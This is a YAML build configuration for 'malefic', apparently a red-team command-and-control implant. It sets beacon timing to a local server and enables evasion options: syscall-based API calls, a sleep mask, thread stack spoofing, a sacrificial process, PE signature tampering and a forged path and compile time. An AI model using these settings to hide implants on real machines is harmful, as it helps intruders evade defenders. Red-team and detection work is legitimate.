server:
  name: "malefic"
  urls:
    - "127.0.0.1:5001"
  proxy: ""
  interval: 1000
  jitter: 10
  ca: ""

implants:
  register_info: true
  modules:
    - "full"
  metadata:
    remap_path: "C:/Windows/Users/Maleficarum"
    icon: ""
    compile_time: "24 Jun 2024 18:03:01"
    file_version: ""
    product_version: ""
    company_name: ""
    product_name: ""
    original_filename: ""
    file_description: ""
    internal_name: ""

  apis:
    # apis_level: "sys_apis", "nt_apis"
    level: "nt_apis"
    # apis_priority: "normal", "user_defined_dyanmic", "func_syscall" "syscalls" 
    priority:
      normal:
        enable: false
        type: "normal"
      dynamic: 
        enable: true
        # type: "sys_dynamic", "user_defined_dynamic"
        type: "user_defined_dynamic"
      syscalls:
        enable: false
        # type: "func_syscall", "inline_syscall"
        type: "inline_syscall"
  alloctor:
    # inprocess: "VirtualAlloc", "VirtualAllocEx", 
    #            "VirtualAllocExNuma", "HeapAlloc", 
    #            "NtMapViewOfSection", "NtAllocateVirtualMemory"
    inprocess: "NtAllocateVirtualMemory"
    # allocter_ex: "VirtualAllocEx", "NtAllocateVirtualMemory", 
    #              "VirtualAllocExNuma", "NtMapViewOfSection"
    crossprocess: "NtAllocateVirtualMemory"
  sleep_mask: true
  sacrifice_process: true
  fork_and_run: false
  hook_exit: true
  thread_stack_spoofer: true
  pe_signature_modify:
    feature: true
    modify:
      magic: "\x00\x00"
      signature: "\x00\x00"